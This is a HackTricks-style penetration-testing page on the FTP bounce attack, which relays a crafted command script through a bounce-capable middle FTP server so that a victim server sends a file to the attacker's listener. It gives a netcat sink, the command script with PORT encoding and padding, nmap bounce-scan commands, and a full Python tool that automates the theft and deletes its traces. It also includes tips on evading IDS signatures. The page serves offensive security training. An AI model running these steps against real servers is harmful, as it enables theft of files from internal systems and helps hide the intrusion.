FTP Bounce: Download a File From a 2nd FTP Server

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Summary

If you have access to a bounce-capable FTP server (the "middle" server), you can make it open a connection to another FTP server (the "victim", where you know some credentials), replay a script of FTP commands to it, and have the victim send a file to a host you control.

Requirements

  • Valid FTP credentials on the FTP Middle server (the bounce host)
  • Valid FTP credentials on the Victim FTP server
  • The Middle server accepts a PORT command that points at a third-party host (the victim's control port, normally 21), and the Victim server accepts a PORT that points at your listener (the classic FTP bounce condition)
  • You can write inside some directory of the FTP Middle server (to upload the command script)
  • The Middle server can reach something on the Victim FTP server that you cannot reach directly (e.g. it sits on an internal network or is allow-listed)

Steps

  1. Make a host you control listen for the incoming data connection: either your own FTP server in passive mode (PASV) or any raw TCP sink. The Victim server will connect to that port and send the file there.
  2. Craft the file the FTP Middle server will send to the Victim server (the exploit script). It is plain text containing the FTP commands needed to authenticate against the Victim server, change directory, point PORT at your listener and RETR the file.
  3. Connect to the FTP Middle Server and upload the previous file.
  4. Make the FTP Middle server establish a connection with the Victim server and send the exploit file.
  5. Capture the file in your own FTP server.
  6. Delete the exploit file from the FTP Middle server.

Quick check for vulnerable bounce hosts

  • Nmap still supports FTP bounce checks. Example to verify a potential middle server:
nmap -Pn -p21 --script ftp-bounce <middle_ftp_ip>
# or directly attempt a bounce scan
nmap -Pn -p80 -b user:pass@<middle_ftp_ip>:21 <internal_target_ip>

If the server refuses third‑party PORT values the scan will fail; some embedded/legacy printers, NAS and appliance FTP daemons still allow it.

Automating the 2nd FTP download

Below is a modernized way to pull a file through a vulnerable middle FTP server.

  1. Open a passive listener on your attack box (any TCP sink works):

    nc -lvnp 2121 > loot.bin  # or run a small pyftpdlib server
    
  2. Note your IP as A,B,C,D and your listener port P as p1,p2 (p1 = P/256, p2 = P%256; for 2121 that is 8,73).

  3. Build the instruction file that the middle server will replay to the victim:

    cat > instrs <<'EOF'
    USER <victim_user>
    PASS <victim_pass>
    CWD /path/inside/victim
    TYPE I
    PORT A,B,C,D,p1,p2
    RETR secret.tar.gz
    QUIT
    EOF
    # Add padding so the control channel stays open on picky daemons
    dd if=/dev/zero bs=1024 count=60 >> instrs
    
  4. Upload & trigger from the middle server (classic proxy FTP):

    # `quote` sends the raw verb to the middle server. The PORT names the victim's
    # control port (0*256+21 = 21); the RETR makes the middle server push instrs there.
    ftp -n <middle_ftp> <<'EOF'
    user <middle_user> <middle_pass>
    binary
    put instrs
    quote PORT <victim_ip_with_commas>,0,21
    quote RETR instrs
    quit
    EOF
    
  5. Grab the file from your listener (loot.bin).

  6. Clean up the uploaded instrs file on the middle server.

Notes:

  • Padding (dd ...): without it the middle server writes the short script in one go and closes the connection as soon as the victim's TCP window has swallowed it, which can end the victim's session before the RETR completes. The victim only drains its control channel between commands, so a few tens of KB of trailing junk keeps the sender blocked (and the connection open) until the transfer to your listener has finished. The classic writeup uses about 60 KB.
  • Any service that can listen and dump TCP can replace the FTP PASV socket (e.g., socat -u TCP-LISTEN:2121,reuseaddr - > loot.bin).
  • Two different PORT commands are in play. The one inside instrs (victim to your listener) can use any high port, and should: many daemons refuse PORT to ports below 1024. The one you send to the middle server must name the victim's control port (21), so a middle server that refuses PORT to privileged ports is only usable if the victim's FTP daemon listens on a high port.
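The whole procedure above (listener, command script with PORT encoding and padding, upload and replay through the middle server, cleanup) plus the third-party-PORT check from the "Quick check" section, as an added example written for this page, not code from the original page or from any tool it mentions. It uses only the Python standard library; every host, port, credential and path is a placeholder assumption, and the middle server is assumed to speak plain FTP on port 21.

```python
#!/usr/bin/env python3
"""Added example, not from the original page: the FTP bounce "2nd download" driven
from Python's standard library. All hosts, ports, credentials and paths are
placeholder assumptions."""
import io
import os
import socket
import tempfile
import threading
from ftplib import FTP, Error


def port_arg(ip: str, port: int) -> str:
    """Encode ip:port as the h1,h2,h3,h4,p1,p2 argument of an FTP PORT command."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets) or not 0 < port < 65536:
        raise ValueError(f"bad endpoint {ip}:{port}")
    return ",".join(str(x) for x in octets + [port // 256, port % 256])


def build_instructions(user, password, cwd, filename, my_ip, my_port,
                       padding=60 * 1024) -> bytes:
    """Command script the middle server will replay into the victim's control port.
    FTP lines end in CRLF. The trailing zero bytes are never meant to run: they keep
    the middle server's write blocked on the victim's TCP window (the victim only
    drains its control channel between commands), so the connection stays open
    until the RETR towards our sink has finished instead of closing at once."""
    lines = [f"USER {user}", f"PASS {password}", f"CWD {cwd}", "TYPE I",
             f"PORT {port_arg(my_ip, my_port)}", f"RETR {filename}", "QUIT"]
    return "".join(line + "\r\n" for line in lines).encode() + b"\0" * padding


def start_sink(port: int, out_path: str, timeout: float = 120.0):
    """Listen once for the victim's data connection and dump it to out_path.
    port=0 picks a free port (see result['port']). Returns (thread, result)."""
    result, ready = {}, threading.Event()

    def run():
        with socket.socket() as srv:
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            try:
                srv.bind(("0.0.0.0", port))
                srv.listen(1)
                result["port"] = srv.getsockname()[1]
            finally:
                ready.set()                      # unblock the caller even if bind failed
            srv.settimeout(timeout)
            try:
                conn, peer = srv.accept()
            except socket.timeout:
                result["bytes"] = None           # the victim never connected back
                return
        with conn, open(out_path, "wb") as fh:
            conn.settimeout(timeout)
            total = 0
            while chunk := conn.recv(65536):
                fh.write(chunk)
                total += len(chunk)
        result.update(bytes=total, peer=peer[0])

    t = threading.Thread(target=run, daemon=True)
    t.start()
    ready.wait()
    if "port" not in result:
        raise RuntimeError(f"could not listen on port {port}")
    return t, result


def accepts_third_party_port(ftp: FTP, other_ip: str, other_port: int = 21) -> bool:
    """Bounce pre-check (manual equivalent of nmap's ftp-bounce script): does the
    middle server accept a PORT naming a different host? Hardened daemons reply 5xx
    ("Illegal PORT command"); a bounceable one replies 200."""
    try:
        return ftp.sendcmd(f"PORT {port_arg(other_ip, other_port)}").startswith("200")
    except Error:
        return False


def bounce_download(middle, muser, mpass, victim_ip, script: bytes,
                    remote_name="instrs", victim_port=21) -> str:
    """Upload the script to the middle server, make it RETR the script into
    victim:21 (the victim runs the commands and pushes the file to our sink),
    then delete the script from the middle server. Returns the final FTP reply."""
    with FTP(middle, timeout=60) as ftp:
        ftp.login(muser, mpass)
        if not accepts_third_party_port(ftp, victim_ip, victim_port):
            raise RuntimeError("middle server refuses third-party PORT; not bounceable")
        ftp.storbinary(f"STOR {remote_name}", io.BytesIO(script))   # uses PASV, leaves PORT free
        ftp.sendcmd(f"PORT {port_arg(victim_ip, victim_port)}")
        reply = ftp.sendcmd(f"RETR {remote_name}")   # 150: middle is dialling the victim
        if reply.startswith("1"):
            reply = ftp.voidresp()                   # 226 once the script has been pushed
        ftp.delete(remote_name)                      # cleanup step
        return reply


def loopback_selftest(sample: bytes = b"constructed sample payload\n") -> int:
    """Check the sink before the real run: push constructed bytes into it over
    loopback, standing in for the victim's data connection; returns bytes captured."""
    path = os.path.join(tempfile.mkdtemp(), "loot.bin")
    thread, res = start_sink(0, path, timeout=10)
    with socket.create_connection(("127.0.0.1", res["port"])) as c:
        c.sendall(sample)
    thread.join(10)
    with open(path, "rb") as fh:
        assert fh.read() == sample
    return res["bytes"]
```

Typical use (all values assumed): `t, sink = start_sink(2121, "loot.bin")`, then `script = build_instructions("vuser", "vpass", "/export", "secret.tar.gz", "10.0.0.5", sink["port"])`, then `bounce_download("middle.example.internal", "muser", "mpass", "10.0.0.20", script)` and `t.join()`; `sink["bytes"]` is the size received and `sink["peer"]` should be the victim's address. The pre-check runs automatically and aborts if the middle server answers the third-party PORT with an error, so you find out it is not bounceable before uploading anything.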

Extra tricks

  • Use a bounceable FTP server to port-scan internal hosts when file relay is blocked:
    nmap -Pn -p22,80,445 -b anonymous:<email>@<middle_ftp> <internal_ip>
    
  • Some IDS/IPS products (e.g., Juniper IPS) ship signatures specifically for FTP:EXPLOIT:BOUNCE-ATTACK; noisy payloads or missing padding may trip them.
  • When the middle server enforces “PORT to same host” restrictions, place your listener on the middle server itself (if you have write/execute) and forward the captured file later.

For a more detailed old-school walkthrough check: http://www.ouah.org/ftpbounce.html
